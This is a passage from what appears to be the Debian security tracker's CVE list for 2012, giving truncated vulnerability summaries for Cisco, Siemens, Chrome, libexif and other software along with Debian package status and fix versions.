(The VPN downloader in the download_install component in Cisco ...) NOT-FOR-US: Cisco AnyConnect Secure Mobility Client CVE-2012-3093 RESERVED CVE-2012-3092 RESERVED CVE-2012-3091 RESERVED CVE-2012-3090 RESERVED CVE-2012-3089 RESERVED CVE-2012-3088 (Cisco AnyConnect Secure Mobility Client 3.1.x before 3.1.00495, and ...) NOT-FOR-US: Cisco AnyConnect Secure Mobility Client CVE-2012-3087 RESERVED CVE-2012-3086 RESERVED CVE-2012-3085 RESERVED CVE-2012-3084 RESERVED CVE-2012-3083 RESERVED CVE-2012-3082 RESERVED CVE-2012-3081 RESERVED CVE-2012-3080 RESERVED CVE-2012-3079 (Cisco IOS 12.2 allows remote attackers to cause a denial of service ...) NOT-FOR-US: Cisco IOS CVE-2012-3078 RESERVED CVE-2012-3077 RESERVED CVE-2012-3076 (The administrative web interface on Cisco TelePresence Recording ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3075 (The administrative web interface on Cisco TelePresence Immersive ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3074 (An unspecified API on Cisco TelePresence Immersive Endpoint Devices ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3073 (The IP implementation on Cisco TelePresence Multipoint Switch before ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3072 RESERVED CVE-2012-3071 RESERVED CVE-2012-3070 RESERVED CVE-2012-3069 RESERVED CVE-2012-3068 RESERVED CVE-2012-3067 RESERVED CVE-2012-3066 RESERVED CVE-2012-3065 RESERVED CVE-2012-3064 RESERVED CVE-2012-3063 (Cisco Application Control Engine (ACE) before A4(2.3) and A5 before ...) NOT-FOR-US: Cisco CVE-2012-3062 RESERVED CVE-2012-3061 RESERVED CVE-2012-3060 (Cisco Unity Connection (UC) 8.6, 9.0, and 9.5 allows remote attackers ...) NOT-FOR-US: Cisco Unity Connection CVE-2012-3059 RESERVED CVE-2012-3058 (Cisco Adaptive Security Appliances (ASA) 5500 series devices, and the ...) NOT-FOR-US: Cisco CVE-2012-3057 (Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3056 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3055 (Stack-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3054 (Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3053 (Buffer overflow in the Cisco WebEx Advanced Recording Format (ARF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3052 (Untrusted search path vulnerability in Cisco VPN Client 5.0 allows ...) NOT-FOR-US: Cisco VPN Client CVE-2012-3051 (Cisco NX-OS 5.2 and 6.1 on Nexus 7000 series switches allows remote ...) NOT-FOR-US: Cisco NX-OS CVE-2012-3050 RESERVED CVE-2012-3049 RESERVED CVE-2012-3048 RESERVED CVE-2012-3047 RESERVED CVE-2012-3046 RESERVED CVE-2012-3045 RESERVED CVE-2012-3044 RESERVED CVE-2012-3043 RESERVED CVE-2012-3042 RESERVED CVE-2012-3041 RESERVED CVE-2012-3040 (Cross-site scripting (XSS) vulnerability in the web server on Siemens ...) NOT-FOR-US: Siemens CVE-2012-3039 RESERVED CVE-2012-3038 RESERVED CVE-2012-3037 (The Siemens SIMATIC S7-1200 2.x PLC does not properly protect the ...) NOT-FOR-US: Siemens SIMATIC PLC CVE-2012-3036 RESERVED CVE-2012-3035 (Buffer overflow in Emerson DeltaV 9.3.1 and 10.3 through 11.3.1 allows ...) NOT-FOR-US: Emerson DeltaV CVE-2012-3034 (WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC ...) NOT-FOR-US: Siemens WinCC CVE-2012-3033 RESERVED CVE-2012-3032 (SQL injection vulnerability in WebNavigator in Siemens WinCC 7.0 SP3 ...) NOT-FOR-US: Siemens WinCC CVE-2012-3031 (Multiple cross-site scripting (XSS) vulnerabilities in WebNavigator in ...) NOT-FOR-US: Siemens WinCC CVE-2012-3030 (WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC ...) NOT-FOR-US: Siemens WinCC CVE-2012-3029 RESERVED CVE-2012-3028 (Cross-site request forgery (CSRF) vulnerability in WebNavigator in ...) NOT-FOR-US: Siemens WinCC CVE-2012-3027 RESERVED CVE-2012-3026 (rifsrvd.exe in the Remote Interface Service in GE Intelligent ...) NOT-FOR-US: GE Intelligent Platforms Proficy Real-Time Information Portal CVE-2012-3025 (The default configuration of Tridium Niagara AX Framework through 3.6 ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-3024 (Tridium Niagara AX Framework through 3.6 uses predictable values for ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-3023 RESERVED CVE-2012-3022 (The SaveToFile method in a certain ActiveX control in TrendDisplay.dll ...) NOT-FOR-US: Canary Labs TrendLink CVE-2012-3021 (rifsrvd.exe in the Remote Interface Service in GE Intelligent ...) NOT-FOR-US: GE Intelligent Platforms Proficy Real-Time Information Portal CVE-2012-3020 (The Siemens Synco OZW Web Server devices OZW672.*, OZW772.*, and ...) NOT-FOR-US: Siemens Synco OZW Web Server CVE-2012-3019 RESERVED CVE-2012-3018 (The lockout-recovery feature in the Security Configurator component in ...) NOT-FOR-US: ICONICS GENESIS32 CVE-2012-3017 (Siemens SIMATIC S7-400 PN CPU devices with firmware 5.x allow remote ...) NOT-FOR-US: Siemens SIMATIC CVE-2012-3016 (Siemens SIMATIC S7-400 PN CPU devices with firmware 6 before 6.0.3 ...) NOT-FOR-US: Siemens SIMATIC CVE-2012-3015 (Untrusted search path vulnerability in Siemens SIMATIC STEP7 before ...) NOT-FOR-US: Siemens SIMATIC CVE-2012-3014 (The Management Software application in GarrettCom Magnum MNS-6K before ...) NOT-FOR-US: GarrettCom Magnum MNS-6K CVE-2012-3013 (WAGO I/O System 758 model 758-870, 758-874, 758-875, and 758-876 ...) NOT-FOR-US: WAGO I/O System 758 CVE-2012-3012 (The Arbiter Power Sentinel 1133A device with firmware before 11Jun2012 ...) NOT-FOR-US: Arbiter Power Sentinel 1133A CVE-2012-3011 (Directory traversal vulnerability in the web server in Fultek WinTr ...) NOT-FOR-US: Fultek WinTr Scada web server CVE-2012-3010 (rifsrvd.exe in the Remote Interface Service in GE Intelligent ...) NOT-FOR-US: GE Intelligent Platforms Proficy Real-Time Information Portal CVE-2012-3009 (Siemens COMOS before 9.1 Patch 413, 9.2 before Update 03 Patch 023, ...) NOT-FOR-US: Siemens COMOS CVE-2012-3008 (Stack-based buffer overflow in OSIsoft PI OPC DA Interface before ...) NOT-FOR-US: OSIsoft PI OPC DA Interface CVE-2012-3007 (Stack-based buffer overflow in slssvc.exe before 58.x in Invensys ...) NOT-FOR-US: Invensys Wonderware SuiteLink CVE-2012-3006 (The Innominate mGuard Smart HW before HW-101130 and BD before ...) NOT-FOR-US: Innominate mGuard Smart CVE-2012-3005 (Untrusted search path vulnerability in Invensys Wonderware InTouch ...) NOT-FOR-US: Wonderwar CVE-2012-3004 (Multiple untrusted search path vulnerabilities in RealFlex RealWin ...) NOT-FOR-US: RealFlex RealWin CVE-2012-3003 (Open redirect vulnerability in an unspecified web application in ...) NOT-FOR-US: WinCC CVE-2012-3002 (The web interface on (1) Foscam and (2) Wansview IP cameras allows ...) NOT-FOR-US: Foscam, Wansview IP cameras CVE-2012-3001 (Mutiny Standard before 4.5-1.12 allows remote attackers to execute ...) NOT-FOR-US: Mutiny Standard CVE-2012-3000 RESERVED CVE-2012-2999 (Multiple cross-site request forgery (CSRF) vulnerabilities in the web ...) NOT-FOR-US: Cerberus FTP CVE-2012-2998 (SQL injection vulnerability in the ad hoc query module in Trend Micro ...) NOT-FOR-US: Trend Micro Control Manager CVE-2012-2997 RESERVED CVE-2012-2996 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Trend Micro CVE-2012-2995 (Multiple cross-site scripting (XSS) vulnerabilities in Trend Micro ...) NOT-FOR-US: Trend Micro CVE-2012-2994 (The CoSoSys Endpoint Protector 4 appliance establishes an EPProot ...) NOT-FOR-US: CoSoSys Endpoint Protector CVE-2012-2993 (Microsoft Windows Phone 7 does not verify the domain name in the ...) NOT-FOR-US: Microsoft Windows Phone CVE-2012-2992 RESERVED CVE-2012-2991 (The PayPal (aka MODULE_PAYMENT_PAYPAL_STANDARD) module before 1.1 in ...) NOT-FOR-US: PayPal module in osCommerce Online Merchant CVE-2012-2990 (The MASetupCaller ActiveX control before 1.4.2012.508 in ...) NOT-FOR-US: MarkAny ContentSAFER CVE-2012-2989 RESERVED CVE-2012-2988 RESERVED CVE-2012-2987 RESERVED CVE-2012-2986 (lhn/public/network/ping in HP SAN/iQ 9.5 on the HP Virtual SAN ...) NOT-FOR-US: HP Virtual SAN Appliance CVE-2012-2985 (Cross-site scripting (XSS) vulnerability in InsertDocument.aspx in ...) NOT-FOR-US: CuteSoft Cute Editor CVE-2012-2984 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Websense CVE-2012-2983 (file/edit_html.cgi in Webmin 1.590 and earlier does not perform an ...) NOT-FOR-US: Webmin CVE-2012-2982 (file/show.cgi in Webmin 1.590 and earlier allows remote authenticated ...) NOT-FOR-US: Webmin CVE-2012-2981 (Webmin 1.590 and earlier allows remote authenticated users to execute ...) NOT-FOR-US: Webmin CVE-2012-2980 (The Samsung and HTC onTouchEvent method implementation for Android on ...) NOT-FOR-US: Samsung and HTC Android CVE-2012-2979 [VU#517036: NSD 3.2.13 emergency release] RESERVED - nsd3 (Debian version not affected) CVE-2012-2978 (query.c in NSD 3.0.x through 3.0.8, 3.1.x through 3.1.1, and 3.2.x ...) {DSA-2515-1} - nsd3 3.2.12-1 CVE-2012-2977 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2976 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2975 (Cross-site scripting (XSS) vulnerability in the traffic overview page ...) NOT-FOR-US: F5 ASM CVE-2012-2974 (The web interface on the SMC SMC8024L2 switch allows remote attackers ...) NOT-FOR-US: SMC SMC8024L2 switch CVE-2012-2973 RESERVED CVE-2012-2972 (The (1) server and (2) agent components in CA ARCserve Backup r12.5, ...) NOT-FOR-US: CA ARCserve Backup CVE-2012-2971 (The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does ...) NOT-FOR-US: CA ARCserve Backup CVE-2012-2970 (The Synel SY-780/A Time & Attendance terminal allows remote attackers ...) NOT-FOR-US: Synel terminal CVE-2012-2969 (Caucho Quercus, as distributed in Resin before 4.0.29, allows remote ...) NOT-FOR-US: Caucho Quercus CVE-2012-2968 (Directory traversal vulnerability in Caucho Quercus, as distributed in ...) NOT-FOR-US: Caucho Quercus CVE-2012-2967 (Caucho Quercus, as distributed in Resin before 4.0.29, does not ...) NOT-FOR-US: Caucho Quercus CVE-2012-2966 (Caucho Quercus, as distributed in Resin before 4.0.29, overwrites ...) NOT-FOR-US: Caucho Quercus CVE-2012-2965 (Caucho Quercus, as distributed in Resin before 4.0.29, does not ...) NOT-FOR-US: Caucho Quercus CVE-2012-2964 (The BreakingPoint Storm appliance before 3.0 requires cleartext ...) NOT-FOR-US: BreakingPoint Storm appliance CVE-2012-2963 (The administrative interface in the embedded web server on the ...) NOT-FOR-US: BreakingPoint Storm appliance CVE-2012-2962 (SQL injection vulnerability in d4d/statusFilter.php in Plixer ...) NOT-FOR-US: Dell SonicWALL Scrutinizer CVE-2012-2961 (SQL injection vulnerability in the management console in Symantec Web ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2960 (Cross-site scripting (XSS) vulnerability in the import functionality ...) NOT-FOR-US: HP ArcSight Connector, ArcSight Logger CVE-2012-2959 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: BMC CVE-2012-2958 RESERVED CVE-2012-2957 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2956 RESERVED CVE-2012-2955 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: IBM Lotus Protector, IBM ISS Proventia Network Mail Security CVE-2012-2954 RESERVED CVE-2012-2953 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2952 (SQL injection vulnerability in add_ons.php in Jaow 2.4.5 and earlier ...) NOT-FOR-US: Jaow CVE-2012-2951 (SQL injection vulnerability in plog-rss.php in Plogger allows remote ...) NOT-FOR-US: Plogger CVE-2012-2950 RESERVED CVE-2012-2949 (The ZTE sync_agent program for Android 2.3.4 on the Score M device ...) NOT-FOR-US: Android CVE-2012-2948 (chan_skinny.c in the Skinny (aka SCCP) channel driver in Certified ...) {DSA-2493-1} - asterisk 1:1.8.13.0~dfsg-1 (bug #675210) CVE-2012-2947 (chan_iax2.c in the IAX2 channel driver in Certified Asterisk ...) {DSA-2493-1} - asterisk 1:1.8.13.0~dfsg-1 (bug #675204) CVE-2012-2946 RESERVED CVE-2012-2945 RESERVED - hadoop (bug #535861) CVE-2010-5140 (wxBitcoin and bitcoind before 0.3.13 do not properly handle bitcoins ...) - bitcoin (Fixed before initial release) CVE-2010-5139 (Integer overflow in wxBitcoin and bitcoind before 0.3.11 allows remote ...) - bitcoin (Fixed before initial release) CVE-2010-5138 (wxBitcoin and bitcoind 0.3.x allow remote attackers to cause a denial ...) - bitcoin 0.4.0-1 CVE-2010-5137 (wxBitcoin and bitcoind before 0.3.5 allow remote attackers to cause a ...) - bitcoin (Fixed before initial release) CVE-2012-2944 (Buffer overflow in the addchar function in common/parseconf.c in upsd ...) {DSA-2484-1} - nut 2.6.4-1 NOTE: https://alioth.debian.org/tracker/index.php?func=detail&aid=313636&group_id=30602&atid=411542 CVE-2012-2943 (CRLF injection vulnerability in cryptographp.inc.php in Cryptographp ...) NOT-FOR-US: Cryptographp CVE-2012-2942 (Buffer overflow in the trash buffer in the header capture ...) - haproxy 1.4.23-1 (bug #674447) NOTE: According to upstream information this only was fixed in 1.4.21 NOTE: only a issue if using non-default value for global.tune.bufsize configuration option NOTE: Reported as duplicate with CVE-2012-2391 http://seclists.org/oss-sec/2012/q2/417 CVE-2012-2941 (Cross-site scripting (XSS) vulnerability in search/ in Yandex.Server ...) NOT-FOR-US: Yandex.Server 2010 9.0 Enterprise CVE-2012-2940 (MediaChance Real-DRAW PRO 5.2.4 allows remote attackers to cause a ...) NOT-FOR-US: MediaChance Real-DRAW PRO CVE-2012-2939 (Multiple unrestricted file upload vulnerabilities in Travelon Express ...) NOT-FOR-US: Travelon Express CVE-2012-2938 (Multiple cross-site scripting (XSS) vulnerabilities in Travelon ...) NOT-FOR-US: Travelon Express CVE-2012-2937 (Multiple SQL injection vulnerabilities in Pligg CMS before 1.2.2 allow ...) NOT-FOR-US: Pligg CVE-2012-2936 (Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS ...) NOT-FOR-US: Pligg CVE-2012-2935 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: OSCommerce Online Merchant CVE-2012-2934 (Xen 4.0, and 4.1, when running a 64-bit PV guest on "older" AMD CPUs, ...) {DSA-2501-1} - xen 4.1.3~rc1+hg-20120614.a9c0a89c08f2-1 CVE-2012-2933 RESERVED CVE-2012-2932 RESERVED CVE-2012-2931 RESERVED CVE-2012-2930 RESERVED CVE-2012-2929 RESERVED CVE-2011-5091 (Multiple SQL injection vulnerabilities in GR Board (aka grboard) ...) NOT-FOR-US: GR Board CVE-2011-5090 (GR Board (aka grboard) 1.8.6.5 Community Edition does not require ...) NOT-FOR-US: GR Board CVE-2012-2928 (The Gliffy plugin before 3.7.1 for Atlassian JIRA, and before 4.2 for ...) NOT-FOR-US: JIRA plugin CVE-2012-2927 (The TM Software Tempo plugin before 6.4.3.1, 6.5.x before 6.5.0.2, and ...) NOT-FOR-US: Atlassian JIRA CVE-2012-2926 (Atlassian JIRA before 5.0.1; Confluence before 3.5.16, 4.0 before ...) NOT-FOR-US: Atlassian JIRA CVE-2012-2925 (SQL injection vulnerability in engine.php in Simple PHP Agenda 2.2.8 ...) NOT-FOR-US: Simple PHP Agenda CVE-2012-2924 (PHP remote file inclusion vulnerability in admin/setup.inc.php in ...) NOT-FOR-US: Hypermethod eLearning Server 4G CVE-2012-2923 (SQL injection vulnerability in news.php4 in Hypermethod eLearning ...) NOT-FOR-US: Hypermethod eLearning Server 4G CVE-2012-2922 (The request_path function in includes/bootstrap.inc in Drupal 7.14 and ...) - drupal7 7.22-1 (unimportant) NOTE: Path disclosure irrelevant for Debian CVE-2012-2921 (Universal Feed Parser (aka feedparser or python-feedparser) before ...) - feedparser 5.1.2-1 (low; bug #674167) [squeeze] - feedparser (Minor issue) CVE-2012-2920 (Cross-site scripting (XSS) vulnerability in the userphoto_options_page ...) NOT-FOR-US: WordPress User Photo plugin CVE-2012-2919 (Directory traversal vulnerability in Upload/engine.php in Chevereto ...) NOT-FOR-US: Chevereto CVE-2012-2918 (Cross-site scripting (XSS) vulnerability in Upload/engine.php in ...) NOT-FOR-US: Chevereto CVE-2012-2917 (Cross-site scripting (XSS) vulnerability in the Share and Follow ...) NOT-FOR-US: WordPress Share and Follow plugin CVE-2012-2916 (Cross-site scripting (XSS) vulnerability in sabre_class_admin.php in ...) NOT-FOR-US: WordPress SABRE plugin CVE-2012-2915 (Stack-based buffer overflow in Lattice Semiconductor PAC-Designer ...) NOT-FOR-US: Lattice Semiconductor PAC-Designer CVE-2012-2914 (Cross-site scripting (XSS) vulnerability in captchademo.php in ...) NOT-FOR-US: Unijimpe Captcha CVE-2012-2913 (Multiple cross-site scripting (XSS) vulnerabilities in the Leaflet ...) NOT-FOR-US: WordPress Leaflet plugin CVE-2012-2912 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: WordPress LeagueManager plugin CVE-2012-2911 (Cross-site scripting (XSS) vulnerability in backupDB.php in ...) NOT-FOR-US: SiliSoftware backupDB CVE-2012-2910 (Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware ...) NOT-FOR-US: SiliSoftware phpThumb CVE-2012-2909 (Multiple cross-site scripting (XSS) vulnerabilities in Viscacha ...) NOT-FOR-US: Viscacha CVE-2012-2908 (Multiple SQL injection vulnerabilities in admin/bbcodes.php in ...) NOT-FOR-US: Viscacha CVE-2012-2907 (Cross-site scripting (XSS) vulnerability in the aberdeen_breadcrumb ...) NOT-FOR-US: Drupal Aberdeen theme CVE-2012-2906 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Artiphp CMS 5.5.0 Neo CVE-2012-2905 (Artiphp CMS 5.5.0 Neo (r422) stores database backups with predictable ...) NOT-FOR-US: Artiphp CMS CVE-2012-2904 (player.swf in LongTail JW Player 5.9 allows remote attackers to ...) NOT-FOR-US: LongTail JW Player CVE-2012-2903 (Multiple cross-site scripting (XSS) vulnerabilities in PHP Address ...) NOT-FOR-US: PHP Address Book CVE-2012-2902 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Joomla JCE CVE-2012-2901 (Cross-site scripting (XSS) vulnerability in the Profile List in the ...) NOT-FOR-US: Joomla JCE CVE-2012-2900 (Skia, as used in Google Chrome before 22.0.1229.92, does not properly ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2899 RESERVED CVE-2012-2898 RESERVED CVE-2012-2897 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows ...) - chromium-browser (Windows-specific) CVE-2012-2896 (Integer overflow in the WebGL implementation in Google Chrome before ...) - chromium-browser (MacOS X-specific) CVE-2012-2895 (The PDF functionality in Google Chrome before 22.0.1229.79 allows ...) - chromium-browser (PDF viewer not included in Chromium) CVE-2012-2894 (Google Chrome before 22.0.1229.79 does not properly handle ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2893 (Double free vulnerability in libxslt, as used in Google Chrome before ...) {DSA-2555-1} - chromium-browser 22.0.1229.94~r161065-1 - libxslt 1.1.26-14 (bug #689422) CVE-2012-2892 (Unspecified vulnerability in Google Chrome before 22.0.1229.79 allows ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2891 (The IPC implementation in Google Chrome before 22.0.1229.79 allows ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2890 (Use-after-free vulnerability in the PDF functionality in Google Chrome ...) - chromium-browser (PDF viewer not included in Chromium) CVE-2012-2889 (Cross-site scripting (XSS) vulnerability in Google Chrome before ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2888 (Use-after-free vulnerability in Google Chrome before 22.0.1229.79 ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2887 (Use-after-free vulnerability in Google Chrome before 22.0.1229.79 ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2886 (Cross-site scripting (XSS) vulnerability in Google Chrome before ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2885 (Double free vulnerability in Google Chrome before 22.0.1229.79 allows ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2884 (Skia, as used in Google Chrome before 22.0.1229.79, allows remote ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2883 (Skia, as used in Google Chrome before 22.0.1229.79, allows remote ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2882 (FFmpeg, as used in Google Chrome before 22.0.1229.79, does not ...) - chromium-browser 22.0.1229.94~r161065-1 - libav 6:0.8.5-1 (bug #694483) - ffmpeg [squeeze] - ffmpeg (vulnerable code not present) NOTE: https://chromiumcodereview.appspot.com/10829204 NOTE: proposed patch for libav: http://patches.libav.org/patch/32636/ NOTE: fixed with http://git.libav.org/?p=libav.git;a=commitdiff;h=7751e4693dd10ec98c20fbd9887233b575034272 CVE-2012-2881 (Google Chrome before 22.0.1229.79 does not properly handle plug-ins, ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2880 (Race condition in Google Chrome before 22.0.1229.79 allows remote ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2879 (Google Chrome before 22.0.1229.79 allows remote attackers to cause a ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2878 (Use-after-free vulnerability in Google Chrome before 22.0.1229.79 ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2877 (The extension system in Google Chrome before 22.0.1229.79 does not ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2876 (Buffer overflow in the SSE2 optimization functionality in Google ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2875 (Multiple unspecified vulnerabilities in the PDF functionality in ...) - chromium-browser (PDF viewer not included in Chromium) CVE-2012-2874 (Skia, as used in Google Chrome before 22.0.1229.79, allows remote ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-2873 RESERVED CVE-2012-2872 (Cross-site scripting (XSS) vulnerability in an SSL interstitial page ...) - chromium-browser 21.0.1180.89~r154005-1 CVE-2012-2871 (libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before ...) {DSA-2555-1} - chromium-browser 21.0.1180.89~r154005-1 - libxslt 1.1.26-14 (bug #689422) CVE-2012-2870 (libxslt 1.1.26 and earlier, as used in Google Chrome before ...) {DSA-2555-1} - chromium-browser 21.0.1180.89~r154005-1 - libxslt 1.1.26-14 (bug #689422) CVE-2012-2869 (Google Chrome before 21.0.1180.89 does not properly load URLs, which ...) - chromium-browser 21.0.1180.89~r154005-1 CVE-2012-2868 (Race condition in Google Chrome before 21.0.1180.89 allows remote ...) - chromium-browser 21.0.1180.89~r154005-1 CVE-2012-2867 (The SPDY implementation in Google Chrome before 21.0.1180.89 allows ...) - chromium-browser 21.0.1180.89~r154005-1 CVE-2012-2866 (Google Chrome before 21.0.1180.89 does not properly perform a cast of ...) - chromium-browser 21.0.1180.89~r154005-1 CVE-2012-2865 (Google Chrome before 21.0.1180.89 does not properly perform line ...) - chromium-browser 21.0.1180.89~r154005-1 CVE-2012-2864 (Mesa, as used in Google Chrome before 21.0.1183.0 on the Acer AC700, ...) - mesa 8.0.4-2 (bug #685667) [squeeze] - mesa (Vulnerable code not present) CVE-2012-2863 (The PDF functionality in Google Chrome before 21.0.1180.75 allows ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2862 (Use-after-free vulnerability in the PDF functionality in Google Chrome ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2861 RESERVED CVE-2012-2860 (The date-picker implementation in Google Chrome before 21.0.1180.57 on ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser NOTE: http://trac.webkit.org/changeset/122918 CVE-2012-2859 (Google Chrome before 21.0.1180.57 on Linux does not properly handle ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2858 (Buffer overflow in the WebP decoder in Google Chrome before ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2857 (Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2856 (The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2855 (Use-after-free vulnerability in the PDF functionality in Google Chrome ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2854 (Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2853 (The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2852 (The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2851 (Multiple integer overflows in the PDF functionality in Google Chrome ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2850 (Multiple unspecified vulnerabilities in the PDF functionality in ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2849 (Off-by-one error in the GIF decoder in Google Chrome before ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2848 (The drag-and-drop implementation in Google Chrome before 21.0.1180.57 ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2847 (Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser CVE-2012-2846 (Google Chrome before 21.0.1180.57 on Linux does not properly isolate ...) - chromium-browser 21.0.1180.57~r148591 [squeeze] - chromium-browser (minor issue) CVE-2012-2845 (Integer overflow in the jpeg_data_load_data function in jpeg-data.c in ...) - exif 0.6.20-2 (low; bug #681465) [squeeze] - exif (Minor crasher) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2844 (The PDF functionality in Google Chrome before 20.0.1132.57 does not ...) - chromium-browser CVE-2012-2843 (Use-after-free vulnerability in Google Chrome before 20.0.1132.57 ...) - chromium-browser 20.0.1132.57~r145807-1 [squeeze] - chromium-browser CVE-2012-2842 (Use-after-free vulnerability in Google Chrome before 20.0.1132.57 ...) - chromium-browser 20.0.1132.57~r145807-1 [squeeze] - chromium-browser CVE-2012-2841 (Integer underflow in the exif_entry_get_value function in exif-entry.c ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2840 (Off-by-one error in the exif_convert_utf16_to_utf8 function in ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2839 RESERVED CVE-2012-2838 RESERVED CVE-2012-2837 (The mnote_olympus_entry_get_value function in ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2836 (The exif_data_load_data function in exif-data.c in the EXIF Tag ...) {DSA-2559-1} - libexif 0.6.20-3 (bug #681454) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229 NOTE: http://seclists.org/oss-sec/2012/q3/74 CVE-2012-2835 RESERVED CVE-2012-2834 (Integer overflow in Google Chrome before 20.0.1132.43 allows remote ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2833 (Buffer overflow in the JS API in the PDF functionality in Google ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2832 (The image-codec implementation in the PDF functionality in Google ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2831 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2830 (Google Chrome before 20.0.1132.43 does not properly set array values, ...) - chromium-browser 20.0.1132.43~r143823-1 [squeeze] - chromium-browser CVE-2012-2829 (Use-after-free vulnerability in the Cascading Style Sheets (CSS) ...) - chromium-browser 20.0.1132.43~r143823-1 CVE-2012-2828 (Multiple integer overflows in the PDF functionality in Google Chrome ...) - chromium-browser (PDF functionality not present in Chromium) CVE-2012-2827 (Use-after-free vulnerability in the UI in Google Chrome before ...) - chromium-browser (MacOS specific) CVE-2012-2826 (Google Chrome before 20.0.1132.43 does not properly implement texture ...) - chromium-browser 20.0.1132.43~r143823-1 